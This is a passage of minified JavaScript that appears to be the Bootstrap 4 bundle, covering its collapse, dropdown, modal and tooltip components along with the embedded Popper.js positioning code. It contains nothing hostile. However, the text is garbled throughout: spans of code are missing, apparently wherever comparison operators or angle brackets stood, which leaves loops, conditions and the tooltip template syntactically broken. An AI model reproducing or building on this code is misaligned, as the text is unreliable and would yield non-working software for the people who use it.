t=[].slice.call(document.querySelectorAll('[data-ride="carousel"]')),e=0,n=t.length;e0&&(this._selector=a,this._triggerArray.push(r))}this._parent=this._config.parent?this._getParent():null,this._config.parent||this._addAriaAndCollapsedClass(this._element,this._triggerArray),this._config.toggle&&this.toggle()}var e=t.prototype;return e.toggle=function(){i.default(this._element).hasClass("show")?this.hide():this.show()},e.show=function(){var e,n,o=this;if(!this._isTransitioning&&!i.default(this._element).hasClass("show")&&(this._parent&&0===(e=[].slice.call(this._parent.querySelectorAll(".show, .collapsing")).filter((function(t){return"string"==typeof o._config.parent?t.getAttribute("data-parent")===o._config.parent:t.classList.contains("collapse")}))).length&&(e=null),!(e&&(n=i.default(e).not(this._selector).data("bs.collapse"))&&n._isTransitioning))){var r=i.default.Event("show.bs.collapse");if(i.default(this._element).trigger(r),!r.isDefaultPrevented()){e&&(t._jQueryInterface.call(i.default(e).not(this._selector),"hide"),n||i.default(e).data("bs.collapse",null));var a=this._getDimension();i.default(this._element).removeClass("collapse").addClass("collapsing"),this._element.style[a]=0,this._triggerArray.length&&i.default(this._triggerArray).removeClass("collapsed").attr("aria-expanded",!0),this.setTransitioning(!0);var s="scroll"+(a[0].toUpperCase()+a.slice(1)),u=l.getTransitionDurationFromElement(this._element);i.default(this._element).one(l.TRANSITION_END,(function(){i.default(o._element).removeClass("collapsing").addClass("collapse show"),o._element.style[a]="",o.setTransitioning(!1),i.default(o._element).trigger("shown.bs.collapse")})).emulateTransitionEnd(u),this._element.style[a]=this._element[s]+"px"}}},e.hide=function(){var t=this;if(!this._isTransitioning&&i.default(this._element).hasClass("show")){var e=i.default.Event("hide.bs.collapse");if(i.default(this._element).trigger(e),!e.isDefaultPrevented()){var n=this._getDimension();this._element.style[n]=this._element.getBoundingClientRect()[n]+"px",l.reflow(this._element),i.default(this._element).addClass("collapsing").removeClass("collapse show");var o=this._triggerArray.length;if(o>0)for(var r=0;r=0)return 1;return 0}();var k=D&&window.Promise?function(t){var e=!1;return function(){e||(e=!0,window.Promise.resolve().then((function(){e=!1,t()})))}}:function(t){var e=!1;return function(){e||(e=!0,setTimeout((function(){e=!1,t()}),N))}};function A(t){return t&&"[object Function]"==={}.toString.call(t)}function I(t,e){if(1!==t.nodeType)return[];var n=t.ownerDocument.defaultView.getComputedStyle(t,null);return e?n[e]:n}function O(t){return"HTML"===t.nodeName?t:t.parentNode||t.host}function x(t){if(!t)return document.body;switch(t.nodeName){case"HTML":case"BODY":return t.ownerDocument.body;case"#document":return t.body}var e=I(t),n=e.overflow,i=e.overflowX,o=e.overflowY;return/(auto|scroll|overlay)/.test(n+o+i)?t:x(O(t))}function j(t){return t&&t.referenceNode?t.referenceNode:t}var L=D&&!(!window.MSInputMethodContext||!document.documentMode),P=D&&/MSIE 10/.test(navigator.userAgent);function F(t){return 11===t?L:10===t?P:L||P}function R(t){if(!t)return document.documentElement;for(var e=F(10)?document.body:null,n=t.offsetParent||null;n===e&&t.nextElementSibling;)n=(t=t.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&"BODY"!==i&&"HTML"!==i?-1!==["TH","TD","TABLE"].indexOf(n.nodeName)&&"static"===I(n,"position")?R(n):n:t?t.ownerDocument.documentElement:document.documentElement}function H(t){return null!==t.parentNode?H(t.parentNode):t}function M(t,e){if(!(t&&t.nodeType&&e&&e.nodeType))return document.documentElement;var n=t.compareDocumentPosition(e)&Node.DOCUMENT_POSITION_FOLLOWING,i=n?t:e,o=n?e:t,r=document.createRange();r.setStart(i,0),r.setEnd(o,0);var a,s,l=r.commonAncestorContainer;if(t!==l&&e!==l||i.contains(o))return"BODY"===(s=(a=l).nodeName)||"HTML"!==s&&R(a.firstElementChild)!==a?R(l):l;var u=H(t);return u.host?M(u.host,e):M(t,H(e).host)}function B(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"top",n="top"===e?"scrollTop":"scrollLeft",i=t.nodeName;if("BODY"===i||"HTML"===i){var o=t.ownerDocument.documentElement,r=t.ownerDocument.scrollingElement||o;return r[n]}return t[n]}function q(t,e){var n=arguments.length>2&&void 0!==arguments[2]&&arguments[2],i=B(e,"top"),o=B(e,"left"),r=n?-1:1;return t.top+=i*r,t.bottom+=i*r,t.left+=o*r,t.right+=o*r,t}function Q(t,e){var n="x"===e?"Left":"Top",i="Left"===n?"Right":"Bottom";return parseFloat(t["border"+n+"Width"])+parseFloat(t["border"+i+"Width"])}function W(t,e,n,i){return Math.max(e["offset"+t],e["scroll"+t],n["client"+t],n["offset"+t],n["scroll"+t],F(10)?parseInt(n["offset"+t])+parseInt(i["margin"+("Height"===t?"Top":"Left")])+parseInt(i["margin"+("Height"===t?"Bottom":"Right")]):0)}function U(t){var e=t.body,n=t.documentElement,i=F(10)&&getComputedStyle(n);return{height:W("Height",e,n,i),width:W("Width",e,n,i)}}var V=function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")},Y=function(){function t(t,e){for(var n=0;n2&&void 0!==arguments[2]&&arguments[2],i=F(10),o="HTML"===e.nodeName,r=G(t),a=G(e),s=x(t),l=I(e),u=parseFloat(l.borderTopWidth),f=parseFloat(l.borderLeftWidth);n&&o&&(a.top=Math.max(a.top,0),a.left=Math.max(a.left,0));var d=K({top:r.top-a.top-u,left:r.left-a.left-f,width:r.width,height:r.height});if(d.marginTop=0,d.marginLeft=0,!i&&o){var c=parseFloat(l.marginTop),h=parseFloat(l.marginLeft);d.top-=u-c,d.bottom-=u-c,d.left-=f-h,d.right-=f-h,d.marginTop=c,d.marginLeft=h}return(i&&!n?e.contains(s):e===s&&"BODY"!==s.nodeName)&&(d=q(d,e)),d}function J(t){var e=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=t.ownerDocument.documentElement,i=$(t,n),o=Math.max(n.clientWidth,window.innerWidth||0),r=Math.max(n.clientHeight,window.innerHeight||0),a=e?0:B(n),s=e?0:B(n,"left"),l={top:a-i.top+i.marginTop,left:s-i.left+i.marginLeft,width:o,height:r};return K(l)}function Z(t){var e=t.nodeName;if("BODY"===e||"HTML"===e)return!1;if("fixed"===I(t,"position"))return!0;var n=O(t);return!!n&&Z(n)}function tt(t){if(!t||!t.parentElement||F())return document.documentElement;for(var e=t.parentElement;e&&"none"===I(e,"transform");)e=e.parentElement;return e||document.documentElement}function et(t,e,n,i){var o=arguments.length>4&&void 0!==arguments[4]&&arguments[4],r={top:0,left:0},a=o?tt(t):M(t,j(e));if("viewport"===i)r=J(a,o);else{var s=void 0;"scrollParent"===i?"BODY"===(s=x(O(e))).nodeName&&(s=t.ownerDocument.documentElement):s="window"===i?t.ownerDocument.documentElement:i;var l=$(s,a,o);if("HTML"!==s.nodeName||Z(a))r=l;else{var u=U(t.ownerDocument),f=u.height,d=u.width;r.top+=l.top-l.marginTop,r.bottom=f+l.top,r.left+=l.left-l.marginLeft,r.right=d+l.left}}var c="number"==typeof(n=n||0);return r.left+=c?n:n.left||0,r.top+=c?n:n.top||0,r.right-=c?n:n.right||0,r.bottom-=c?n:n.bottom||0,r}function nt(t){return t.width*t.height}function it(t,e,n,i,o){var r=arguments.length>5&&void 0!==arguments[5]?arguments[5]:0;if(-1===t.indexOf("auto"))return t;var a=et(n,i,r,o),s={top:{width:a.width,height:e.top-a.top},right:{width:a.right-e.right,height:a.height},bottom:{width:a.width,height:a.bottom-e.bottom},left:{width:e.left-a.left,height:a.height}},l=Object.keys(s).map((function(t){return X({key:t},s[t],{area:nt(s[t])})})).sort((function(t,e){return e.area-t.area})),u=l.filter((function(t){var e=t.width,i=t.height;return e>=n.clientWidth&&i>=n.clientHeight})),f=u.length>0?u[0].key:l[0].key,d=t.split("-")[1];return f+(d?"-"+d:"")}function ot(t,e,n){var i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:null,o=i?tt(e):M(e,j(n));return $(n,o,i)}function rt(t){var e=t.ownerDocument.defaultView.getComputedStyle(t),n=parseFloat(e.marginTop||0)+parseFloat(e.marginBottom||0),i=parseFloat(e.marginLeft||0)+parseFloat(e.marginRight||0);return{width:t.offsetWidth+i,height:t.offsetHeight+n}}function at(t){var e={left:"right",right:"left",bottom:"top",top:"bottom"};return t.replace(/left|right|bottom|top/g,(function(t){return e[t]}))}function st(t,e,n){n=n.split("-")[0];var i=rt(t),o={width:i.width,height:i.height},r=-1!==["right","left"].indexOf(n),a=r?"top":"left",s=r?"left":"top",l=r?"height":"width",u=r?"width":"height";return o[a]=e[a]+e[l]/2-i[l]/2,o[s]=n===s?e[s]-i[u]:e[at(s)],o}function lt(t,e){return Array.prototype.find?t.find(e):t.filter(e)[0]}function ut(t,e,n){return(void 0===n?t:t.slice(0,function(t,e,n){if(Array.prototype.findIndex)return t.findIndex((function(t){return t[e]===n}));var i=lt(t,(function(t){return t[e]===n}));return t.indexOf(i)}(t,"name",n))).forEach((function(t){t.function&&console.warn("`modifier.function` is deprecated, use `modifier.fn`!");var n=t.function||t.fn;t.enabled&&A(n)&&(e.offsets.popper=K(e.offsets.popper),e.offsets.reference=K(e.offsets.reference),e=n(e,t))})),e}function ft(){if(!this.state.isDestroyed){var t={instance:this,styles:{},arrowStyles:{},attributes:{},flipped:!1,offsets:{}};t.offsets.reference=ot(this.state,this.popper,this.reference,this.options.positionFixed),t.placement=it(this.options.placement,t.offsets.reference,this.popper,this.reference,this.options.modifiers.flip.boundariesElement,this.options.modifiers.flip.padding),t.originalPlacement=t.placement,t.positionFixed=this.options.positionFixed,t.offsets.popper=st(this.popper,t.offsets.reference,t.placement),t.offsets.popper.position=this.options.positionFixed?"fixed":"absolute",t=ut(this.modifiers,t),this.state.isCreated?this.options.onUpdate(t):(this.state.isCreated=!0,this.options.onCreate(t))}}function dt(t,e){return t.some((function(t){var n=t.name;return t.enabled&&n===e}))}function ct(t){for(var e=[!1,"ms","Webkit","Moz","O"],n=t.charAt(0).toUpperCase()+t.slice(1),i=0;i1&&void 0!==arguments[1]&&arguments[1],n=Tt.indexOf(t),i=Tt.slice(n+1).concat(Tt.slice(0,n));return e?i.reverse():i}var St="flip",Dt="clockwise",Nt="counterclockwise";function kt(t,e,n,i){var o=[0,0],r=-1!==["right","left"].indexOf(i),a=t.split(/(\+|\-)/).map((function(t){return t.trim()})),s=a.indexOf(lt(a,(function(t){return-1!==t.search(/,|\s/)})));a[s]&&-1===a[s].indexOf(",")&&console.warn("Offsets separated by white space(s) are deprecated, use a comma (,) instead.");var l=/\s*,\s*|\s+/,u=-1!==s?[a.slice(0,s).concat([a[s].split(l)[0]]),[a[s].split(l)[1]].concat(a.slice(s+1))]:[a];return(u=u.map((function(t,i){var o=(1===i?!r:r)?"height":"width",a=!1;return t.reduce((function(t,e){return""===t[t.length-1]&&-1!==["+","-"].indexOf(e)?(t[t.length-1]=e,a=!0,t):a?(t[t.length-1]+=e,a=!1,t):t.concat(e)}),[]).map((function(t){return function(t,e,n,i){var o=t.match(/((?:\-|\+)?\d*\.?\d*)(.*)/),r=+o[1],a=o[2];if(!r)return t;if(0===a.indexOf("%")){var s=void 0;switch(a){case"%p":s=n;break;case"%":case"%r":default:s=i}return K(s)[e]/100*r}if("vh"===a||"vw"===a){return("vh"===a?Math.max(document.documentElement.clientHeight,window.innerHeight||0):Math.max(document.documentElement.clientWidth,window.innerWidth||0))/100*r}return r}(t,o,e,n)}))}))).forEach((function(t,e){t.forEach((function(n,i){_t(n)&&(o[e]+=n*("-"===t[i-1]?-1:1))}))})),o}var At={placement:"bottom",positionFixed:!1,eventsEnabled:!0,removeOnDestroy:!1,onCreate:function(){},onUpdate:function(){},modifiers:{shift:{order:100,enabled:!0,fn:function(t){var e=t.placement,n=e.split("-")[0],i=e.split("-")[1];if(i){var o=t.offsets,r=o.reference,a=o.popper,s=-1!==["bottom","top"].indexOf(n),l=s?"left":"top",u=s?"width":"height",f={start:z({},l,r[l]),end:z({},l,r[l]+r[u]-a[u])};t.offsets.popper=X({},a,f[i])}return t}},offset:{order:200,enabled:!0,fn:function(t,e){var n=e.offset,i=t.placement,o=t.offsets,r=o.popper,a=o.reference,s=i.split("-")[0],l=void 0;return l=_t(+n)?[+n,0]:kt(n,r,a,s),"left"===s?(r.top+=l[0],r.left-=l[1]):"right"===s?(r.top+=l[0],r.left+=l[1]):"top"===s?(r.left+=l[0],r.top-=l[1]):"bottom"===s&&(r.left+=l[0],r.top+=l[1]),t.popper=r,t},offset:0},preventOverflow:{order:300,enabled:!0,fn:function(t,e){var n=e.boundariesElement||R(t.instance.popper);t.instance.reference===n&&(n=R(n));var i=ct("transform"),o=t.instance.popper.style,r=o.top,a=o.left,s=o[i];o.top="",o.left="",o[i]="";var l=et(t.instance.popper,t.instance.reference,e.padding,n,t.positionFixed);o.top=r,o.left=a,o[i]=s,e.boundaries=l;var u=e.priority,f=t.offsets.popper,d={primary:function(t){var n=f[t];return f[t]l[t]&&!e.escapeWithReference&&(i=Math.min(f[n],l[t]-("right"===t?f.width:f.height))),z({},n,i)}};return u.forEach((function(t){var e=-1!==["left","top"].indexOf(t)?"primary":"secondary";f=X({},f,d[e](t))})),t.offsets.popper=f,t},priority:["left","right","top","bottom"],padding:5,boundariesElement:"scrollParent"},keepTogether:{order:400,enabled:!0,fn:function(t){var e=t.offsets,n=e.popper,i=e.reference,o=t.placement.split("-")[0],r=Math.floor,a=-1!==["top","bottom"].indexOf(o),s=a?"right":"bottom",l=a?"left":"top",u=a?"width":"height";return n[s]r(i[s])&&(t.offsets.popper[l]=r(i[s])),t}},arrow:{order:500,enabled:!0,fn:function(t,e){var n;if(!wt(t.instance.modifiers,"arrow","keepTogether"))return t;var i=e.element;if("string"==typeof i){if(!(i=t.instance.popper.querySelector(i)))return t}else if(!t.instance.popper.contains(i))return console.warn("WARNING: `arrow.element` must be child of its popper element!"),t;var o=t.placement.split("-")[0],r=t.offsets,a=r.popper,s=r.reference,l=-1!==["left","right"].indexOf(o),u=l?"height":"width",f=l?"Top":"Left",d=f.toLowerCase(),c=l?"left":"top",h=l?"bottom":"right",p=rt(i)[u];s[h]-pa[h]&&(t.offsets.popper[d]+=s[d]+p-a[h]),t.offsets.popper=K(t.offsets.popper);var m=s[d]+s[u]/2-p/2,g=I(t.instance.popper),v=parseFloat(g["margin"+f]),_=parseFloat(g["border"+f+"Width"]),b=m-t.offsets.popper[d]-v-_;return b=Math.max(Math.min(a[u]-p,b),0),t.arrowElement=i,t.offsets.arrow=(z(n={},d,Math.round(b)),z(n,c,""),n),t},element:"[x-arrow]"},flip:{order:600,enabled:!0,fn:function(t,e){if(dt(t.instance.modifiers,"inner"))return t;if(t.flipped&&t.placement===t.originalPlacement)return t;var n=et(t.instance.popper,t.instance.reference,e.padding,e.boundariesElement,t.positionFixed),i=t.placement.split("-")[0],o=at(i),r=t.placement.split("-")[1]||"",a=[];switch(e.behavior){case St:a=[i,o];break;case Dt:a=Ct(i);break;case Nt:a=Ct(i,!0);break;default:a=e.behavior}return a.forEach((function(s,l){if(i!==s||a.length===l+1)return t;i=t.placement.split("-")[0],o=at(i);var u=t.offsets.popper,f=t.offsets.reference,d=Math.floor,c="left"===i&&d(u.right)>d(f.left)||"right"===i&&d(u.left)d(f.top)||"bottom"===i&&d(u.top)d(n.right),m=d(u.top)d(n.bottom),v="left"===i&&h||"right"===i&&p||"top"===i&&m||"bottom"===i&&g,_=-1!==["top","bottom"].indexOf(i),b=!!e.flipVariations&&(_&&"start"===r&&h||_&&"end"===r&&p||!_&&"start"===r&&m||!_&&"end"===r&&g),y=!!e.flipVariationsByContent&&(_&&"start"===r&&p||_&&"end"===r&&h||!_&&"start"===r&&g||!_&&"end"===r&&m),w=b||y;(c||v||w)&&(t.flipped=!0,(c||v)&&(i=a[l+1]),w&&(r=function(t){return"end"===t?"start":"start"===t?"end":t}(r)),t.placement=i+(r?"-"+r:""),t.offsets.popper=X({},t.offsets.popper,st(t.instance.popper,t.offsets.reference,t.placement)),t=ut(t.instance.modifiers,t,"flip"))})),t},behavior:"flip",padding:5,boundariesElement:"viewport",flipVariations:!1,flipVariationsByContent:!1},inner:{order:700,enabled:!1,fn:function(t){var e=t.placement,n=e.split("-")[0],i=t.offsets,o=i.popper,r=i.reference,a=-1!==["left","right"].indexOf(n),s=-1===["top","left"].indexOf(n);return o[a?"left":"top"]=r[n]-(s?o[a?"width":"height"]:0),t.placement=at(e),t.offsets.popper=K(o),t}},hide:{order:800,enabled:!0,fn:function(t){if(!wt(t.instance.modifiers,"hide","preventOverflow"))return t;var e=t.offsets.reference,n=lt(t.instance.modifiers,(function(t){return"preventOverflow"===t.name})).boundaries;if(e.bottomn.right||e.top>n.bottom||e.right2&&void 0!==arguments[2]?arguments[2]:{};V(this,t),this.scheduleUpdate=function(){return requestAnimationFrame(i.update)},this.update=k(this.update.bind(this)),this.options=X({},t.Defaults,o),this.state={isDestroyed:!1,isCreated:!1,scrollParents:[]},this.reference=e&&e.jquery?e[0]:e,this.popper=n&&n.jquery?n[0]:n,this.options.modifiers={},Object.keys(X({},t.Defaults.modifiers,o.modifiers)).forEach((function(e){i.options.modifiers[e]=X({},t.Defaults.modifiers[e]||{},o.modifiers?o.modifiers[e]:{})})),this.modifiers=Object.keys(this.options.modifiers).map((function(t){return X({name:t},i.options.modifiers[t])})).sort((function(t,e){return t.order-e.order})),this.modifiers.forEach((function(t){t.enabled&&A(t.onLoad)&&t.onLoad(i.reference,i.popper,i.options,t,i.state)})),this.update();var r=this.options.eventsEnabled;r&&this.enableEventListeners(),this.state.eventsEnabled=r}return Y(t,[{key:"update",value:function(){return ft.call(this)}},{key:"destroy",value:function(){return ht.call(this)}},{key:"enableEventListeners",value:function(){return gt.call(this)}},{key:"disableEventListeners",value:function(){return vt.call(this)}}]),t}();It.Utils=("undefined"!=typeof window?window:global).PopperUtils,It.placements=Et,It.Defaults=At;var Ot="dropdown",xt=i.default.fn[Ot],jt=new RegExp("38|40|27"),Lt={offset:0,flip:!0,boundary:"scrollParent",reference:"toggle",display:"dynamic",popperConfig:null},Pt={offset:"(number|string|function)",flip:"boolean",boundary:"(string|element)",reference:"(string|element)",display:"string",popperConfig:"(null|object)"},Ft=function(){function t(t,e){this._element=t,this._popper=null,this._config=this._getConfig(e),this._menu=this._getMenuElement(),this._inNavbar=this._detectNavbar(),this._addEventListeners()}var e=t.prototype;return e.toggle=function(){if(!this._element.disabled&&!i.default(this._element).hasClass("disabled")){var e=i.default(this._menu).hasClass("show");t._clearMenus(),e||this.show(!0)}},e.show=function(e){if(void 0===e&&(e=!1),!(this._element.disabled||i.default(this._element).hasClass("disabled")||i.default(this._menu).hasClass("show"))){var n={relatedTarget:this._element},o=i.default.Event("show.bs.dropdown",n),r=t._getParentFromElement(this._element);if(i.default(r).trigger(o),!o.isDefaultPrevented()){if(!this._inNavbar&&e){if("undefined"==typeof It)throw new TypeError("Bootstrap's dropdowns require Popper.js (https://popper.js.org/)");var a=this._element;"parent"===this._config.reference?a=r:l.isElement(this._config.reference)&&(a=this._config.reference,"undefined"!=typeof this._config.reference.jquery&&(a=this._config.reference[0])),"scrollParent"!==this._config.boundary&&i.default(r).addClass("position-static"),this._popper=new It(a,this._menu,this._getPopperConfig())}"ontouchstart"in document.documentElement&&0===i.default(r).closest(".navbar-nav").length&&i.default(document.body).children().on("mouseover",null,i.default.noop),this._element.focus(),this._element.setAttribute("aria-expanded",!0),i.default(this._menu).toggleClass("show"),i.default(r).toggleClass("show").trigger(i.default.Event("shown.bs.dropdown",n))}}},e.hide=function(){if(!this._element.disabled&&!i.default(this._element).hasClass("disabled")&&i.default(this._menu).hasClass("show")){var e={relatedTarget:this._element},n=i.default.Event("hide.bs.dropdown",e),o=t._getParentFromElement(this._element);i.default(o).trigger(n),n.isDefaultPrevented()||(this._popper&&this._popper.destroy(),i.default(this._menu).toggleClass("show"),i.default(o).toggleClass("show").trigger(i.default.Event("hidden.bs.dropdown",e)))}},e.dispose=function(){i.default.removeData(this._element,"bs.dropdown"),i.default(this._element).off(".bs.dropdown"),this._element=null,this._menu=null,null!==this._popper&&(this._popper.destroy(),this._popper=null)},e.update=function(){this._inNavbar=this._detectNavbar(),null!==this._popper&&this._popper.scheduleUpdate()},e._addEventListeners=function(){var t=this;i.default(this._element).on("click.bs.dropdown",(function(e){e.preventDefault(),e.stopPropagation(),t.toggle()}))},e._getConfig=function(t){return t=a({},this.constructor.Default,i.default(this._element).data(),t),l.typeCheckConfig(Ot,t,this.constructor.DefaultType),t},e._getMenuElement=function(){if(!this._menu){var e=t._getParentFromElement(this._element);e&&(this._menu=e.querySelector(".dropdown-menu"))}return this._menu},e._getPlacement=function(){var t=i.default(this._element.parentNode),e="bottom-start";return t.hasClass("dropup")?e=i.default(this._menu).hasClass("dropdown-menu-right")?"top-end":"top-start":t.hasClass("dropright")?e="right-start":t.hasClass("dropleft")?e="left-start":i.default(this._menu).hasClass("dropdown-menu-right")&&(e="bottom-end"),e},e._detectNavbar=function(){return i.default(this._element).closest(".navbar").length>0},e._getOffset=function(){var t=this,e={};return"function"==typeof this._config.offset?e.fn=function(e){return e.offsets=a({},e.offsets,t._config.offset(e.offsets,t._element)||{}),e}:e.offset=this._config.offset,e},e._getPopperConfig=function(){var t={placement:this._getPlacement(),modifiers:{offset:this._getOffset(),flip:{enabled:this._config.flip},preventOverflow:{boundariesElement:this._config.boundary}}};return"static"===this._config.display&&(t.modifiers.applyStyle={enabled:!1}),a({},t,this._config.popperConfig)},t._jQueryInterface=function(e){return this.each((function(){var n=i.default(this).data("bs.dropdown");if(n||(n=new t(this,"object"==typeof e?e:null),i.default(this).data("bs.dropdown",n)),"string"==typeof e){if("undefined"==typeof n[e])throw new TypeError('No method named "'+e+'"');n[e]()}}))},t._clearMenus=function(e){if(!e||3!==e.which&&("keyup"!==e.type||9===e.which))for(var n=[].slice.call(document.querySelectorAll('[data-toggle="dropdown"]')),o=0,r=n.length;o0&&a--,40===e.which&&adocument.documentElement.clientHeight;n||(this._element.style.overflowY="hidden"),this._element.classList.add("modal-static");var o=l.getTransitionDurationFromElement(this._dialog);i.default(this._element).off(l.TRANSITION_END),i.default(this._element).one(l.TRANSITION_END,(function(){t._element.classList.remove("modal-static"),n||i.default(t._element).one(l.TRANSITION_END,(function(){t._element.style.overflowY=""})).emulateTransitionEnd(t._element,o)})).emulateTransitionEnd(o),this._element.focus()}else this.hide()},e._showElement=function(t){var e=this,n=i.default(this._element).hasClass("fade"),o=this._dialog?this._dialog.querySelector(".modal-body"):null;this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE||document.body.appendChild(this._element),this._element.style.display="block",this._element.removeAttribute("aria-hidden"),this._element.setAttribute("aria-modal",!0),this._element.setAttribute("role","dialog"),i.default(this._dialog).hasClass("modal-dialog-scrollable")&&o?o.scrollTop=0:this._element.scrollTop=0,n&&l.reflow(this._element),i.default(this._element).addClass("show"),this._config.focus&&this._enforceFocus();var r=i.default.Event("shown.bs.modal",{relatedTarget:t}),a=function(){e._config.focus&&e._element.focus(),e._isTransitioning=!1,i.default(e._element).trigger(r)};if(n){var s=l.getTransitionDurationFromElement(this._dialog);i.default(this._dialog).one(l.TRANSITION_END,a).emulateTransitionEnd(s)}else a()},e._enforceFocus=function(){var t=this;i.default(document).off("focusin.bs.modal").on("focusin.bs.modal",(function(e){document!==e.target&&t._element!==e.target&&0===i.default(t._element).has(e.target).length&&t._element.focus()}))},e._setEscapeEvent=function(){var t=this;this._isShown?i.default(this._element).on("keydown.dismiss.bs.modal",(function(e){t._config.keyboard&&27===e.which?(e.preventDefault(),t.hide()):t._config.keyboard||27!==e.which||t._triggerBackdropTransition()})):this._isShown||i.default(this._element).off("keydown.dismiss.bs.modal")},e._setResizeEvent=function(){var t=this;this._isShown?i.default(window).on("resize.bs.modal",(function(e){return t.handleUpdate(e)})):i.default(window).off("resize.bs.modal")},e._hideModal=function(){var t=this;this._element.style.display="none",this._element.setAttribute("aria-hidden",!0),this._element.removeAttribute("aria-modal"),this._element.removeAttribute("role"),this._isTransitioning=!1,this._showBackdrop((function(){i.default(document.body).removeClass("modal-open"),t._resetAdjustments(),t._resetScrollbar(),i.default(t._element).trigger("hidden.bs.modal")}))},e._removeBackdrop=function(){this._backdrop&&(i.default(this._backdrop).remove(),this._backdrop=null)},e._showBackdrop=function(t){var e=this,n=i.default(this._element).hasClass("fade")?"fade":"";if(this._isShown&&this._config.backdrop){if(this._backdrop=document.createElement("div"),this._backdrop.className="modal-backdrop",n&&this._backdrop.classList.add(n),i.default(this._backdrop).appendTo(document.body),i.default(this._element).on("click.dismiss.bs.modal",(function(t){e._ignoreBackdropClick?e._ignoreBackdropClick=!1:t.target===t.currentTarget&&e._triggerBackdropTransition()})),n&&l.reflow(this._backdrop),i.default(this._backdrop).addClass("show"),!t)return;if(!n)return void t();var o=l.getTransitionDurationFromElement(this._backdrop);i.default(this._backdrop).one(l.TRANSITION_END,t).emulateTransitionEnd(o)}else if(!this._isShown&&this._backdrop){i.default(this._backdrop).removeClass("show");var r=function(){e._removeBackdrop(),t&&t()};if(i.default(this._element).hasClass("fade")){var a=l.getTransitionDurationFromElement(this._backdrop);i.default(this._backdrop).one(l.TRANSITION_END,r).emulateTransitionEnd(a)}else r()}else t&&t()},e._adjustDialog=function(){var t=this._element.scrollHeight>document.documentElement.clientHeight;!this._isBodyOverflowing&&t&&(this._element.style.paddingLeft=this._scrollbarWidth+"px"),this._isBodyOverflowing&&!t&&(this._element.style.paddingRight=this._scrollbarWidth+"px")},e._resetAdjustments=function(){this._element.style.paddingLeft="",this._element.style.paddingRight=""},e._checkScrollbar=function(){var t=document.body.getBoundingClientRect();this._isBodyOverflowing=Math.round(t.left+t.right)
',trigger:"hover focus",title:"",delay:0,html:!1,selector:!1,placement:"top",offset:0,container:!1,fallbackPlacement:"flip",boundary:"scrollParent",sanitize:!0,sanitizeFn:null,whiteList:Qt,popperConfig:null},Zt={HIDE:"hide.bs.tooltip",HIDDEN:"hidden.bs.tooltip",SHOW:"show.bs.tooltip",SHOWN:"shown.bs.tooltip",INSERTED:"inserted.bs.tooltip",CLICK:"click.bs.tooltip",FOCUSIN:"focusin.bs.tooltip",FOCUSOUT:"focusout.bs.tooltip",MOUSEENTER:"mouseenter.bs.tooltip",MOUSELEAVE:"mouseleave.bs.tooltip"},te=function(){function t(t,e){if("undefined"==typeof It)throw new TypeError("Bootstrap's tooltips require Popper.js (https://popper.js.org/)");this._isEnabled=!0,this._timeout=0,this._hoverState="",this._activeTrigger={},this._popper=null,this.element=t,this.config=this._getConfig(e),this.tip=null,this._setListeners()}var e=t.prototype;return e.enable=function(){this._isEnabled=!0},e.disable=function(){this._isEnabled=!1},e.toggleEnabled=function(){this._isEnabled=!this._isEnabled},e.toggle=function(t){if(this._isEnabled)if(t){var e=this.constructor.DATA_KEY,n=i.default(t.currentTarget).data(e);n||(n=new this.constructor(t.currentTarget,this._getDelegateConfig()),i.default(t.currentTarget).data(e,n)),n._activeTrigger.click=!n._activeTrigger.click,n._isWithActiveTrigger()?n._enter(null,n):n._leave(null,n)}else{if(i.default(this.getTipElement()).hasClass("show"))return void this._leave(null,this);this._enter(null,this)}},e.dispose=function(){clearTimeout(this._timeout),i.default.removeData(this.element,this.constructor.DATA_KEY),i.default(this.element).off(this.constructor.EVENT_KEY),i.default(this.element).closest(".modal").off("hide.bs.modal",this._hideModalHandler),this.tip&&i.default(this.tip).remove(),this._isEnabled=null,this._timeout=null,this._hoverState=null,this._activeTrigger=null,this._popper&&this._popper.destroy(),this._popper=null,this.element=null,this.config=null,this.tip=null},e.show=function(){var t=this;if("none"===i.default(this.element).css("display"))throw new Error("Please use show on visible elements");var e=i.default.Event(this.constructor.Event.SHOW);if(this.isWithContent()&&this._isEnabled){i.default(this.element).trigger(e);var n=l.findShadowRoot(this.element),o=i.default.contains(null!==n?n:this.element.ownerDocument.documentElement,this.element);if(e.isDefaultPrevented()||!o)return;var r=this.getTipElement(),a=l.getUID(this.constructor.NAME);r.setAttribute("id",a),this.element.setAttribute("aria-describedby",a),this.setContent(),this.config.animation&&i.default(r).addClass("fade");var s="function"==typeof this.config.placement?this.config.placement.call(this,r,this.element):this.config.placement,u=this._getAttachment(s);this.addAttachmentClass(u);var f=this._getContainer();i.default(r).data(this.constructor.DATA_KEY,this),i.default.contains(this.element.ownerDocument.documentElement,this.tip)||i.default(r).appendTo(f),i.default(this.element).trigger(this.constructor.Event.INSERTED),this._popper=new It(this.element,r,this._getPopperConfig(u)),i.default(r).addClass("show"),"ontouchstart"in document.documentElement&&i.default(document.body).children().on("mouseover",null,i.default.noop);var d=function(){t.config.animation&&t._fixTransition();var e=t._hoverState;t._hoverState=null,i.default(t.element).trigger(t.constructor.Event.SHOWN),"out"===e&&t._leave(null,t)};if(i.default(this.tip).hasClass("fade")){var c=l.getTransitionDurationFromElement(this.tip);i.default(this.tip).one(l.TRANSITION_END,d).emulateTransitionEnd(c)}else d()}},e.hide=function(t){var e=this,n=this.getTipElement(),o=i.default.Event(this.constructor.Event.HIDE),r=function(){"show"!==e._hoverState&&n.parentNode&&n.parentNode.removeChild(n),e._cleanTipClass(),e.element.removeAttribute("aria-describedby"),i.default(e.element).trigger(e.constructor.Event.HIDDEN),null!==e._popper&&e._popper.destroy(),t&&t()};if(i.default(this.element).trigger(o),!o.isDefaultPrevented()){if(i.default(n).removeClass("show"),"ontouchstart"in document.documentElement&&i.default(document.body).children().off("mouseover",null,i.default.noop),this._activeTrigger.click=!1,this._activeTrigger.focus=!1,this._activeTrigger.hover=!1,i.default(this.tip).hasClass("fade")){var a=l.getTransitionDurationFromElement(n);i.default(n).one(l.TRANSITION_END,r).emulateTransitionEnd(a)}else r();this._hoverState=""}},e.update=function(){null!==this._popper&&this._popper.scheduleUpdate()},e.isWithContent=function(){return 